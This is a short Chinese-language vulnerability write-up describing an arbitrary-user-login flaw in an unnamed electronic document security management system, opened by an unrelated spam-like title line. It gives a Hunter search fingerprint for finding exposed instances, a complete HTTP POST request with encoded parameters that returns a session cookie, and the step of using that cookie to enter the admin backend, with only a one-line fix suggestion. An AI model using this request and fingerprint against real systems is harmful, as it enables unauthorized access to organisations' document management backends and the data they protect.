安卓app開發(fā)框架??趕eo計(jì)費(fèi)
漏洞簡介
某電子文檔安全管理系統(tǒng)存在任意用戶登錄漏洞,攻擊者可以通過用戶名獲取對應(yīng)的cookie,登錄后臺。
資產(chǎn)測繪
Hunter語法:web.icon==“9fd216c3e694850445607451fe3b3568”
漏洞復(fù)現(xiàn)
- 獲取Cookie
POST /CDGServer3/LinkFilterService HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/120.0.0.0 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,applicati
on/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7,en-US;q=0.6
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 72userId=GCGHGAGGFAFHFGFCFEFPFD&cur=OHBLODPEJJNLEEGIMPOKHMCPJCHJIDHHCJCACB
帶上Cookie訪問URL + /CDGServer3/frame.jsp,即可登錄后臺
修復(fù)建議
對相關(guān)接口進(jìn)行限制訪問、鑒權(quán)。